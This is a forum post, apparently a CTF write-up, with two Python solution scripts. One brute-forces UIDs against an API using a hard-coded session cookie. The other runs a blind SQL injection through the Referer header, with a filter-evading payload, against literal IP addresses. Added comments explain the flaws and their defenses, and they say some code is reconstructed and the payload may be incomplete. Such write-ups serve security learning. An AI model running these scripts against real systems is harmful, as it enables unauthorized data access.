Night 发表于 2020-10-28 17:10:00
第五题的思路是暴力枚举 UID:对每个候选 UID 发送一次 GET 请求,脚本如下:
from bs4 import BeautifulSoup
from urllib import parse
import threading
import requests
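# CTF challenge 5: sequential uid enumeration against the challenge API.
#
# The page extraction dropped every '+' and all indentation from this
# listing; both are restored here. The nesting of the trailing `else` is
# reconstructed (attached to the '404 Not Found' check) -- confirm against
# the original post.
#
# What the script demonstrates: the endpoint takes the uid from the query
# string, and the script expects the answer to depend on that value. That is
# an object-level authorization gap: the uid should come from the
# authenticated session and be checked server-side, and a single session
# walking 40,000 consecutive ids is a pattern rate limiting and request
# logging should catch.

# The caller's own `session` cookie, read interactively rather than stored.
sess = input('请输入您的cookie中的session项目')

# Fixed window of 40,000 consecutive candidate uids.
for i in range(100336889, 100336889 + 40000):
    # A fresh requests session per candidate, as in the original listing.
    session = requests.session()
    # NOTE(review): this `role` cookie is a hard-coded value published with
    # the write-up. Its first dot-separated segment is base64 JSON carrying a
    # uid, so it looks like a signed client-side cookie -- treat it as leaked
    # session material, not as a reusable constant.
    session.cookies.set('role', 'eyJ1aWQiOiIxOTM0Mjg3OCJ9.X5Pt0Q.IBUmdFKzPIrQdrZxXSMPShfYCd8')
    session.cookies.set('session', sess)
    response = session.get("http://45.113.201.36/api/ctf/5?uid=" + str(i))
    response.encoding = 'UTF-8'
    try:
        text = response.json()
        # A JSON body whose code is anything other than '403' is reported.
        if text['code'] != '403':
            print('---------------------------')
            print(text)
            print('uid= ', i)
            print('---------------------------')
    except Exception:
        # Body was not JSON, or had no 'code' key: report it unless it is
        # the plain 404 page.
        if '404 Not Found' not in response.text:
            print('---------------------------')
            print(response.text)
            print('uid = ', i)
            print('---------------------------')
        else:
            print('wrong: ' + str(i))
    response.close()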
第六题的注入点在 HTTP 请求头 Referer 中,因此编写脚本通过 Referer 进行注入,脚本如下:
import requests
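# CTF challenge 6: boolean-blind SQL injection through the Referer header.
#
# The page extraction dropped every '+' and all indentation from this
# listing. The operators outside the payload string are restored
# (`left + right`, `flag += ...`); the payload itself is reproduced exactly
# as the page shows it and may have lost characters the same way. Whether
# print(flag) sat inside the outer loop is reconstructed -- confirm against
# the original post.
#
# What the script demonstrates:
#   * Request headers are untrusted input. The application evidently places
#     the Referer value into a SQL statement without parameterization.
#   * The doubled keywords in the payload suggest the challenge strips SQL
#     keywords in a single pass; a blacklist of that kind is not a defense.
#     Parameterized queries are the fix.
#   * The response length (5596 bytes) is the true/false oracle, so the
#     traffic is many near-identical requests that differ only in the
#     Referer header -- log and alert on SQL syntax in that header.
url = 'http://120.92.151.189/blog/single.php?id=1'
flag = ''

# Recover up to 99 characters, one position at a time.
for i in range(1, 100):
    # Binary search over the byte value; the search window is (33, 128].
    left = 33
    right = 128
    while right - left != 1:
        mid = (left + right) // 2
        # {i} is the character position, {mid} the hex threshold compared.
        payload = "0123'^if(substr((selselectect flag from flag),{i},1)>binary {mid},(selecselectt 1 ~0),0) ununionion selecselectt 1,2#".format(i=i, mid=hex(mid))
        headers = {
            'Referer': payload
        }
        r = requests.get(url=url, headers=headers)
        # A body of exactly 5596 characters is read as "character > mid".
        if len(r.text) == 5596:
            left = mid
        else:
            right = mid
    flag += chr(right)
    print(flag)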